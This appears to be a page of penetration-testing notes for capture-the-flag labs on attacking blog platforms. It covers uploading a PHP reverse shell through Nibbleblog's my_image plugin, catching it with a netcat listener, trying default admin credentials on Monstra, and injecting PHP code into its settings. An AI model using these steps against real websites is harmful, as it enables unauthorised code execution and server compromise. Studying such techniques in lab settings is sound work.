Blogs

Priority

Extends > Themes "Helloworld" > Save
System > Backup > Content > Files > Save something
System > Settings > Maintenance Mode <?php phpinfo(); ?> ..Save
Plugins are often exploitable
searchsploit
github 'issues'

REF

DirbNiktoWP - Also has webapp/cms/scanner

Nibbleblog

https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
Obtain Admin credentials > Activate My image plugin by visiting
http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
Upload PHP shell, ignore warnings Visit
http://localhost/nibbleblog/content/private/plugins/my_image/image.php
No matter what you NAME the php upload.. it will ALWAYS be "image.php" after uploading

Setup reverse.php
Upload: "reverse.php" with my IP

Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php

nc -nvlp 4444
Connected!

Monstra

TartarHTB

Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails

-----------------------
-----------------------
searchsploit monstra
github monstra > Issues > 
php code execution
Look for sqli or lfi

Gym Management

REF: Redteam CTF Defcon Pivonka found this vuln on his own! Actually a pubic/known exploit

PreviousApache NextColdfusion

Last updated 2 years ago

Was this helpful?